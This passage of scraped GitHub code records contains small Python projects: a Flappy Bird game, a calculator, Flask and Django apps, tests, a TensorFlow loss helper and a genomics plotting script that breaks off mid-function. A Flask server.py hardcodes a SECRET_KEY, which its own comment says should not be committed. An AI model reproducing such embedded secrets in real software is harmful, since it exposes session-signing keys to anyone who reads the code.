5\n        if self.angle <= -35:\n            self.angle = -35\n\n    def bump(self):\n        self.speed = -(SPEED + 2)\n        self.angle = 45\n\n\nclass Ground(pygame.sprite.Sprite):\n\n    def __init__(self, xpos):\n        pygame.sprite.Sprite.__init__(self)\n\n        self.image = pygame.image.load('base.png').convert_alpha()\n        self.image = pygame.transform.scale(self.image, (GROUND_WIDTH, GROUND_HEIGHT))\n\n        self.mask = pygame.mask.from_surface(self.image)\n\n        self.rect = self.image.get_rect()\n        self.rect[0] = xpos\n        self.rect[1] = SCREEN_HEIGHT - GROUND_HEIGHT\n\n    def update(self):\n        self.rect[0] -= GAME_SPEED\n\nclass Pipe(pygame.sprite.Sprite):\n\n    def __init__(self, xpos, ysize):\n        pygame.sprite.Sprite.__init__(self)\n\n        self.image = pygame.image.load('pipe-green.png')\n        self.image = pygame.transform.scale(self.image, (PIPE_WIDTH, PIPE_HEIGHT))\n        self.rect = self.image.get_rect()\n        self.rect[0] = xpos\n\n\ndef is_off_screen(sprite):\n    return sprite.rect[0] < -(sprite.rect[2])\n\ndef is_bird_off_screen(sprite):\n    return sprite.rect[1] < 0\n\ndef collide(group1, group2):\n    return pygame.sprite.groupcollide(group1, group2, False, False, pygame.sprite.collide_mask)\n\ndef gameOver():\n    GAME_OVER = pygame.image.load('gameover.png')\n    screen.blit(GAME_OVER, (SCREEN_WIDTH / 2 - 100, SCREEN_HEIGHT / 2 - 30))\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\nBACKGROUND = pygame.image.load('background-day.png')\nBACKGROUND = pygame.transform.scale(BACKGROUND, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nbird_group = pygame.sprite.Group()\nbird = Bird()\nbird_group.add(bird)\n\nground_group = pygame.sprite.Group()\nfor i in range(2):\n    ground = Ground(GROUND_WIDTH * i)\n    ground_group.add(ground)\n\n\ndef game():\n    while True:\n        Clock.tick(24)\n        for event in pygame.event.get():\n            if event.type == 
QUIT:\n                pygame.quit()\n\n            if event.type == KEYDOWN:\n                if event.key == K_SPACE:\n                    bird.bump()\n\n        screen.blit(BACKGROUND, (0, 0))\n\n        if is_off_screen(ground_group.sprites()[0]):\n            ground_group.remove(ground_group.sprites()[0])\n            new_ground = Ground(GROUND_WIDTH - 20)\n            ground_group.add(new_ground)\n\n        if is_bird_off_screen(bird_group.sprites()[0]):\n            gameOver()\n            pygame.time.wait(1000)\n            break\n\n        bird_group.update()\n        ground_group.update()\n\n        bird_group.draw(screen)\n        ground_group.draw(screen)\n\n        if collide(bird_group, ground_group):\n            gameOver()\n            pygame.time.wait(1000)\n            break\n\n        pygame.display.update()\n\n\ngame()\n","repo_name":"maironAzevedo/reimagined-spoon","sub_path":"flappybird/Flappy.py","file_name":"Flappy.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5730171231","text":"from PIL import Image\n\nprogram = {\n    '000': '0',\n    '001': '1',\n    '010': '0',\n    '011': '1',\n    '100': '1',\n    '101': '0',\n    '110': '1',\n    '111': '0'\n}\n\nROWS = 500\nCOLS = 500\n\nhistory = [{0}]\n\nfor i in range(0, ROWS - 1):\n    history.append(set())\n    for j in range(-COLS, COLS):\n        if program[''.join(['1' if j - 1 in history[-2] else '0', '1' if j in history[-2] else '0', '1' if j + 1 in history[-2] else '0'])] == '1':\n            history[-1].add(j)\n\nimg = Image.new('RGB', (COLS * 2, ROWS), \"white\")\nfor row, cols in enumerate(history):\n    for col in cols:\n        img.putpixel((col + COLS, row), (0, 0, 0))\n\nimg.save(\"im.png\", \"png\")\n","repo_name":"vfxlightning/sejt","sub_path":"cellular.py","file_name":"cellular.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74880687091","text":"#!/usr/bin/env python\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\nfrom paint.server.api import api\n\napp = Flask(__name__)\nCORS(app)\napp.config.from_mapping(\n    # This should not be committed to git.\n    SECRET_KEY=\"7b735b01a8d30801b6da30978d4e14a6d27a5b46036d8f4182bc96c027beed8c\",\n)\napp.register_blueprint(api)\n\n\n@app.route(\"/api/home\", methods=['GET'])\ndef return_home():\n    return jsonify({\n        'message': 'Hello, World!'\n    })\n\nif __name__ == \"__main__\":\n    app.run(debug=True, port=8080)\n","repo_name":"mdretkie/paint-2023z","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27772956595","text":"from CX import CSFlow\nimport tensorflow as tf\n\n\ndef random_sampling(tensor_NHWC, n, indices=None):\n    N, H, W, C = tf.convert_to_tensor(tensor_NHWC).shape.as_list()\n    S = H * W\n    tensor_NSC = tf.reshape(tensor_NHWC, [N, S, C])\n    all_indices = list(range(S))\n    shuffled_indices = tf.random_shuffle(all_indices)\n    indices = tf.gather(shuffled_indices, list(range(n)), axis=0) if indices is None else indices\n    indices_old = tf.random_uniform([n], 0, S, tf.int32) if indices is None else indices\n    # print(\"1\", tensor_NSC.shape)\n    res = tf.gather(tensor_NSC, indices, axis=1)\n    # print(\"2\", res.shape)\n    return res, indices\n\ndef random_pooling(feats, output_1d_size=100):\n    is_input_tensor = type(feats) is tf.Tensor\n\n    if is_input_tensor:\n        feats = [feats]\n\n    # convert all inputs to tensors\n    feats = [tf.convert_to_tensor(feats_i) for feats_i in feats]\n\n    N, H, W, C = feats[0].shape.as_list()\n    feats_sampled_0, indices = random_sampling(feats[0], 
output_1d_size ** 2)\n    res = [feats_sampled_0]\n    for i in range(1, len(feats)):\n        feats_sampled_i, _ = random_sampling(feats[i], -1, indices)\n        res.append(feats_sampled_i)\n\n    res = [tf.reshape(feats_sampled_i, [N, output_1d_size, output_1d_size, C]) for feats_sampled_i in res]\n    if is_input_tensor:\n        return res[0]\n    return res\n\ndef crop_quarters(feature_tensor):\n    N = tf.shape(feature_tensor)[0]\n    fH = tf.to_float(tf.shape(feature_tensor)[1])\n    fW = tf.to_float(tf.shape(feature_tensor)[2])\n    fC = tf.shape(feature_tensor)[3]\n    quarters_list = []\n    quarter_size = [N, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n                    tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), fC]\n    quarters_list.append(tf.slice(feature_tensor,\n                                  [0, 0, 0, 0], quarter_size))\n    quarters_list.append(tf.slice(feature_tensor,\n                                  [0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), 0, 0],quarter_size))\n    quarters_list.append(tf.slice(feature_tensor,\n                                  [0, 0, tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size))\n    quarters_list.append(tf.slice(feature_tensor,\n                                  [0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size))\n    feature_tensor = tf.concat(quarters_list, axis=0)\n    return feature_tensor\n\ndef crop_quarters_sep(feature_tensor):\n    N = tf.shape(feature_tensor)[0]\n    fH = tf.to_float(tf.shape(feature_tensor)[1])\n    fW = tf.to_float(tf.shape(feature_tensor)[2])\n    fC = tf.shape(feature_tensor)[3]\n    quarters_list = []\n    quarter_size = [N, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n                    tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), fC]\n    quarters_1 = tf.slice(feature_tensor,[0, 0, 0, 0], quarter_size)\n    quarters_2 = tf.slice(feature_tensor,[0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), 0, 0],quarter_size)\n    quarters_3 = tf.slice(feature_tensor,[0, 0, tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size)\n    quarters_4 = tf.slice(feature_tensor,[0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n                          tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size)\n    return quarters_1,quarters_2,quarters_3,quarters_4\n\ndef ident(feat):\n    return feat\n\n# NOTE: this second crop_quarters definition rebinds the name and shadows the\n# graph-op version above; it assumes statically known shapes and is the one\n# CX_loss_helper below actually calls.\ndef crop_quarters(feature_tensor):\n    N, fH, fW, fC = feature_tensor.shape.as_list()\n    quarters_list = []\n    quarter_size = [N, round(fH / 2), round(fW / 2), fC]\n    quarters_list.append(tf.slice(feature_tensor, [0, 0, 0, 0], quarter_size))\n    quarters_list.append(tf.slice(feature_tensor, [0, round(fH / 2), 0, 0], quarter_size))\n    quarters_list.append(tf.slice(feature_tensor, [0, 0, round(fW / 2), 0], quarter_size))\n    quarters_list.append(tf.slice(feature_tensor, [0, round(fH / 2), round(fW / 2), 0], quarter_size))\n    feature_tensor = tf.concat(quarters_list, axis=0)\n    return feature_tensor\n\n\ndef CX_loss_helper(vgg_A, vgg_B, CX_config):\n    if CX_config.crop_quarters is True:\n        vgg_A = crop_quarters(vgg_A)\n        vgg_B = crop_quarters(vgg_B)\n\n    N, fH, fW, fC = vgg_A.shape.as_list()\n    if fH * fW <= CX_config.max_sampling_1d_size ** 2:\n        print(' #### Skipping pooling for CX....')\n    else:\n        print(' #### pooling for CX %d**2 out of %dx%d' % (CX_config.max_sampling_1d_size, fH, fW))\n        vgg_A, vgg_B = random_pooling([vgg_A, vgg_B], output_1d_size=CX_config.max_sampling_1d_size)\n\n    CX_loss,_ = CSFlow.CX_loss(vgg_A, vgg_B,\n                               distance=CX_config.Dist,\n                               nnsigma=CX_config.nn_stretch_sigma,\n                               w_spatial=CX_config.w_spatial)\n    return 
CX_loss\n","repo_name":"ceciliavision/zoom-learn-zoom","sub_path":"CX/CX_helper.py","file_name":"CX_helper.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"21"} +{"seq_id":"11664537193","text":"from django.urls import reverse\r\nfrom rest_framework import status\r\nfrom rest_framework.test import APIClient\r\nfrom django.test import TestCase\r\n\r\nfrom books.models import Book\r\n\r\nBOOK_URL = reverse(\"books:books-list\")\r\n\r\n\r\nclass BookViewSetTestCase(TestCase):\r\n def setUp(self):\r\n self.fixture_data = {}\r\n self.client = APIClient()\r\n self.book = Book.objects.create(\r\n title=\"Test Book\",\r\n author=\"Test Author\",\r\n cover=1,\r\n inventory=5,\r\n daily_fee=1.99,\r\n )\r\n\r\n def test_permissions_for_list(self):\r\n url = BOOK_URL\r\n response = self.client.get(url)\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n\r\n def test_permissions_for_create(self):\r\n url = BOOK_URL\r\n data = {\r\n \"title\": \"New Book\",\r\n \"author\": \"New Author\",\r\n \"cover\": 0,\r\n \"inventory\": 10,\r\n \"daily_fee\": 2.99,\r\n }\r\n response = self.client.post(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_retrieve(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n response = self.client.get(url)\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n\r\n def test_permissions_for_update(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n data = {\r\n \"title\": \"Updated Book\",\r\n \"author\": \"Updated Author\",\r\n \"cover\": 0,\r\n \"inventory\": 10,\r\n \"daily_fee\": 2.99,\r\n }\r\n response = self.client.put(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_partial_update(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n data = {\r\n \"title\": \"Updated Book\",\r\n \"inventory\": 10,\r\n }\r\n response = self.client.patch(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_delete(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n response = self.client.delete(url)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_get_queryset(self):\r\n url = BOOK_URL\r\n response = self.client.get(url)\r\n self.assertEqual(len(response.data), 1)\r\n self.assertEqual(response.data[0][\"title\"], self.book.title)\r\n self.assertEqual(response.data[0][\"inventory\"], self.book.inventory)\r\n self.assertEqual(response.data[0][\"cover\"], self.book.cover)\r\n self.assertEqual(response.data[0][\"daily_fee\"], str(self.book.daily_fee))\r\n","repo_name":"AnnaKabatova/library-service","sub_path":"books/tests/book_view_test.py","file_name":"book_view_test.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74953367412","text":"# coding=utf-8\n__author__ = 'xiaohengli@pathbook.com.cn'\n\nimport time\nfrom drivers import *\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\n\nclass 
TestCase(unit.TestCase):\n\n    def setUp(self):\n        self.driver = self.app(__file__)\n        self.driver.login()\n\n    def tearDown(self):\n        self.driver.switch_to_home()\n\n    def test_Subplatform(self):\n        '''\n        The dropdown should show: Default, Running, Down, Abnormal, Not started\n        :return:\n        '''\n        li=self.driver.find_id('main_menu').find_tags('li')[1]\n        above=li.find_element_by_link_text(u'系统监控')\n        self.driver.action_chains().move_to_element(above).perform()\n        # Hover the mouse over the sub-platform monitoring entry\n        li.find_element_by_link_text(u'子平台监控').click()\n        opts=self.driver.find_element_by_id('state').find_tags('option')\n        self.assertTrue(opts[0].text==u'默认')\n        tuple=(u'默认',u'运行中',u'宕机',u'异常',u'未启动')\n        isExist = True\n        for opt in opts:\n            type=opt.get_attribute('text')\n            print(type)\n            if not type in tuple:\n                isExist = False\n                break\n        self.assertTrue(isExist,u'Dropdown option was not selected')\n\n\n    def test_Subplatformbox(self):\n        '''\n        Select \"Running\" in the dropdown\n        :return:\n        '''\n        li=self.driver.find_id('main_menu').find_tags('li')[1]\n        above=li.find_element_by_link_text(u'系统监控')\n        self.driver.action_chains().move_to_element(above).perform()\n        # Hover the mouse over the sub-platform monitoring entry\n        li.find_element_by_link_text(u'子平台监控').click()\n        opts=self.driver.find_element_by_id('state').find_tags('option')\n        for opt in opts:\n            # Check whether this option's text matches the target state\n\n            if opt.get_attribute('text')==u'运行中':\n                opt.click()\n                self.assertTrue(opt.is_selected(),u'Dropdown option was not selected')\n\n    def test_zitingt(self):\n        '''\n        Can switch freely among the other options; the chosen option is echoed correctly in the text box\n        :return:\n        '''\n        above=self.driver.find_element_by_link_text(u'系统监控')\n        self.driver.action_chains().move_to_element(above).perform()\n        # Hover the mouse over the monitoring menu entry\n        self.driver.find_element_by_link_text(u'子平台监控').click()\n        Select( self.driver.find_element_by_id(\"state\")).select_by_visible_text(u\"宕机\")\n        self.driver.find_element_by_css_selector(\"option[value=\\\"-1\\\"]\").click()\n        Select(self.driver.find_element_by_id(\"state\")).select_by_visible_text(u\"异常\")\n        self.driver.find_element_by_css_selector(\"option[value=\\\"-2\\\"]\").click()\n        self.driver.find_element_by_id(\"query\").click()\n        self.assertEqual(u\"子平台监控\", self.driver.title)\n\n\n    def test_RefreshSubplatform(self):\n        '''\n        Click the query button\n        :return:\n        '''\n        above=self.driver.find_element_by_link_text(u'系统监控')\n        self.driver.action_chains().move_to_element(above).perform()\n        # Hover the mouse over the monitoring menu entry\n        self.driver.find_element_by_link_text(u'子平台监控').click()\n        self.driver.find_element_by_id(\"query\").click()\n        self.assertEqual(u\"子平台监控\", self.driver.title)\n","repo_name":"cash2one/AutoDriver","sub_path":"testcase/Autobook/op/test_op_Submonitoring.py","file_name":"test_op_Submonitoring.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35418552518","text":"import json\nfrom flask import Flask, jsonify, request, make_response\n\nbasic_api = Flask(__name__)\n\nwith open(\"resume.json\") as json_data:\n\tresume = json.load(json_data)\n\n@basic_api.route('/', methods=['GET'])\ndef display_resume():\n\tif request.method == 'GET':\n\t\treturn make_response(jsonify(resume), 200)\n\nif __name__ == '__main__':\n    basic_api.run(debug=False, host='0.0.0.0', port=8080)","repo_name":"sheltowt/personal_site_as_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30410757051","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n# These are the global variables.\r\nval = \"\"\r\nA = 0\r\noperator = \"\"\r\n# Callback commands for every button used in the 
Calculator.\r\ndef btn_1_isclicked():\r\n global val\r\n val = val + \"1\"\r\n data.set(val)\r\n\r\ndef btn_2_isclicked():\r\n global val\r\n val = val + \"2\"\r\n data.set(val)\r\n\r\ndef btn_3_isclicked():\r\n global val\r\n val = val + \"3\"\r\n data.set(val)\r\n\r\ndef btn_4_isclicked():\r\n global val\r\n val = val + \"4\"\r\n data.set(val)\r\n\r\ndef btn_5_isclicked():\r\n global val\r\n val = val + \"5\"\r\n data.set(val)\r\n\r\ndef btn_6_isclicked():\r\n global val\r\n val = val + \"6\"\r\n data.set(val)\r\n\r\ndef btn_7_isclicked():\r\n global val\r\n val = val + \"7\"\r\n data.set(val)\r\n\r\ndef btn_8_isclicked():\r\n global val\r\n val = val + \"8\"\r\n data.set(val)\r\n\r\ndef btn_9_isclicked():\r\n global val\r\n val = val + \"9\"\r\n data.set(val)\r\n\r\ndef btn_0_isclicked():\r\n global val\r\n val = val + \"0\"\r\n data.set(val)\r\n\r\ndef btn_plus_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"+\"\r\n val = val + \"+\"\r\n data.set(val)\r\n\r\ndef btn_minus_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"-\"\r\n val = val + \"-\"\r\n data.set(val)\r\n\r\ndef btn_multi_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"*\"\r\n val = val + \"*\"\r\n data.set(val)\r\n\r\ndef btn_div_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"/\"\r\n val = val + \"/\"\r\n data.set(val)\r\n\r\ndef c_pressed():\r\n global A\r\n global operator\r\n global val\r\n\r\n val = \"\"\r\n A = 0\r\n operator = \"\"\r\n data.set(val)\r\n\r\ndef erase_pressed():\r\n global A\r\n global operator\r\n global val\r\n erase = data.get()\r\n pj = len(erase)\r\n erase = erase[0:(pj-1)]\r\n val = erase\r\n data.set(val)\r\n \r\n\r\n\r\ndef result():\r\n global A\r\n global operator\r\n global val\r\n val2 = val\r\n if operator == \"+\":\r\n X = float((val2.split(\"+\")[1]))\r\n C = A + X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"-\":\r\n X = float((val2.split(\"-\")[1]))\r\n C = A - X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"*\":\r\n X = float((val2.split(\"*\")[1]))\r\n C = A*X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"/\":\r\n X = float((val2.split(\"/\")[1]))\r\n if X == 0:\r\n messagebox.showerror(\"Error\",\"Division by 0 Not supported\")\r\n A = \"\"\r\n val = \"\"\r\n data.set(val)\r\n else:\r\n C = float(A / X)\r\n data.set(C)\r\n val = str(C)\r\n\r\n \r\n\r\n\r\n#calculator screen orientation \r\nroot = tkinter.Tk()\r\nroot.geometry(\"400x400+600+200\")\r\nroot.resizable(1,1)\r\nroot.title(\"Calculator\")\r\n\r\n# these are the frame in which the button are designed\r\ndata = StringVar()\r\nlbl = Label(\r\n root,\r\n text = \"Label\",\r\n anchor = SE,\r\n font = (\"comic sans\",20),\r\n textvariable = data,\r\n background = \"#000000\",\r\n fg = \"#ffffff\",\r\n )\r\nlbl.pack(expand = True, fill = \"both\")\r\n\r\nbtnrow1 = Frame(root,bg=\"#000000\")\r\nbtnrow1.pack(expand = True, fill = \"both\",)\r\n \r\nbtnrow2 = Frame(root)\r\nbtnrow2.pack(expand = True, fill = \"both\")\r\n\r\nbtnrow3 = Frame(root)\r\nbtnrow3.pack(expand = True, fill = \"both\")\r\n\r\nbtnrow4 = Frame(root)\r\nbtnrow4.pack(expand = True, fill = \"both\")\r\nbtnrow5 = Frame(root)\r\nbtnrow5.pack(expand = True, fill = \"both\")\r\n\r\n# Button designed and its command\r\nbtn1 = Button(\r\n btnrow1,\r\n text = \"1\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = 
btn_1_isclicked,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow1,\r\n text = \"2\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_2_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow1,\r\n text = \"3\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_3_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow1,\r\n text = \"+\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_plus_clicked,\r\n \r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow2,\r\n text = \"4\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_4_isclicked,\r\n )\r\n\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow2,\r\n text = \"5\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_5_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow2,\r\n text = \"6\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_6_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow2,\r\n text = \"-\",\r\n font = (\"verdana\", 24),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_minus_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow3,\r\n text = \"7\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_7_isclicked,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow3,\r\n text = \"8\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_8_isclicked,\r\n )\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow3,\r\n text = \"9\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_9_isclicked,\r\n )\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow3,\r\n text = \"x\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_multi_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\n\r\n\r\n\r\n\r\nbtn1 = Button(\r\n btnrow4,\r\n text = \"C\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = c_pressed,\r\n )\r\nbtn1.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn2 = Button(\r\n btnrow4,\r\n text = \"0\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_0_isclicked)\r\nbtn2.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn3 = Button(\r\n btnrow4,\r\n text = \"=\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = result,)\r\nbtn3.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn4 = Button(\r\n btnrow4,\r\n text = \"/\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = btn_div_clicked,\r\n )\r\nbtn4.pack(side = LEFT, expand = True, fill = \"both\",)\r\n\r\nbtn5 = Button(\r\n btnrow5,\r\n text = \"<-\",\r\n font = (\"verdana\", 22),\r\n relief = GROOVE,\r\n border = 0,\r\n command = erase_pressed\r\n )\r\nbtn5.pack(side = LEFT, expand = True, fill = 
\"both\",)\r\n\r\nroot.mainloop()","repo_name":"ZaidanNur/PojectProjectan","sub_path":"Python OOP/Kalkulator/Kalkulator.py","file_name":"Kalkulator.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17209724716","text":"import altair as alt\nimport pandas as pd\nimport streamlit as st\n#Disable the row limit\n\n\ndef count_amplification(df, gene, sample_type):\n return df[(df[f'cna_{gene}'] > 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_deletion(df, gene, sample_type):\n return df[(df[f'cna_{gene}'] < 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_mutation(df, gene, sample_type):\n return df[(df[f'mut_{gene}'] != 0) & (df['Sample_Types'] == sample_type)]['SAMPLE_ID'].nunique()\n\ndef count_samples(df, sample_type):\n return df[df['Sample_Types'] == sample_type]['SAMPLE_ID'].nunique()\n\ndef fraction(row):\n total = row['Total']\n if total == 0:\n return 0\n else:\n return int(row[row.name]) / int(total)\n\ndef get_jason_charts(selected_cancer, valid_genes, cna_df, mut_df, sample_df):\n sample_df['Sample_Types'] = \"None\"\n sample_df.loc[(sample_df['Sample Type'] == 'Primary') & (sample_df['Metastatic patient'] == True), \n 'Sample_Types'] = \"Primary_from_Met\"\n sample_df.loc[(sample_df['Sample Type'] == 'Primary') & (sample_df['Metastatic patient'] == False), \n 'Sample_Types'] = \"Primary_from_NoMet\"\n sample_df.loc[(sample_df['Sample Type'] == 'Metastasis'), 'Sample_Types'] = \"Metastasis\"\n\n sample_df['patient_count'] = 1\n sample_df = sample_df.rename(columns={'Sample ID': 'SAMPLE_ID'})\n\n filtered_mut_df = mut_df[mut_df[\"Hugo_Symbol\"].isin(valid_genes)]\n filtered_cna_df = cna_df[cna_df[\"Hugo_Symbol\"].isin(valid_genes)]\n\n filtered_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n filtered_cna_df_T.reset_index(inplace=True)\n filtered_cna_df_T = filtered_cna_df_T.add_prefix(\"cna_\")\n filtered_cna_df_T = filtered_cna_df_T.rename(columns={'cna_index': 'SAMPLE_ID'})\n\n sample_df_filtered_cancer_types = None\n if selected_cancer != \"Pan Cancer\":\n sample_df_filtered_cancer_types = sample_df[sample_df[\"Cancer Type\"].isin([selected_cancer])]\n else:\n sample_df_filtered_cancer_types = sample_df\n\n filtered_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n filtered_cna_df_T.reset_index(inplace=True)\n filtered_cna_df_T = filtered_cna_df_T.add_prefix(\"cna_\")\n filtered_cna_df_T = filtered_cna_df_T.rename(columns={'cna_index': 'SAMPLE_ID'})\n # 2. Merge CNA into sample table.\n sample_cna_df_filtered_cancer_types = sample_df_filtered_cancer_types.merge(filtered_cna_df_T,\n on='SAMPLE_ID',\n # Left is filtered, right is not\n how='left')\n # 3. Wrangle with mutation dataframe.\n filtered_mut_heat = filtered_mut_df[[\"Hugo_Symbol\", \"Tumor_Sample_Barcode\", \"Variant_Classification\"]]\n filtered_mut_heat = filtered_mut_heat.groupby([\"Tumor_Sample_Barcode\", \"Hugo_Symbol\"]).size().reset_index(name='Count')\n filtered_mut_heat = pd.pivot(filtered_mut_heat, columns=['Hugo_Symbol'], index=[\"Tumor_Sample_Barcode\"], values=\"Count\").add_prefix(\"mut_\").reset_index()\n filtered_mut_heat = filtered_mut_heat.rename(columns={'Tumor_Sample_Barcode': 'SAMPLE_ID'})\n # 4. 
Merge mutation into sample table.\n    merged_sample_df = sample_cna_df_filtered_cancer_types.merge(filtered_mut_heat,\n                                                    on='SAMPLE_ID',\n                                                    # Left is filtered by cancer type, right is not\n                                                    how='left')\n    merged_sample_df = merged_sample_df.fillna(0)\n\n    counts = []\n    Pri_Met = ['Primary_from_Met', 'Primary_from_NoMet', 'Metastasis']\n    primary_from_met_count = count_samples(merged_sample_df, 'Primary_from_Met')\n    primary_from_no_met_count = count_samples(merged_sample_df, 'Primary_from_NoMet')\n    metastasis_count = count_samples(merged_sample_df, 'Metastasis')\n    # Each sample type uses its own group size as the denominator for its fractions\n    totals_by_type = {'Primary_from_Met': primary_from_met_count,\n                      'Primary_from_NoMet': primary_from_no_met_count,\n                      'Metastasis': metastasis_count}\n    for gene in valid_genes:\n        for pm in Pri_Met:\n            total = totals_by_type[pm]\n            amplification_count = count_amplification(merged_sample_df, gene,pm)\n            deletion_count = count_deletion(merged_sample_df, 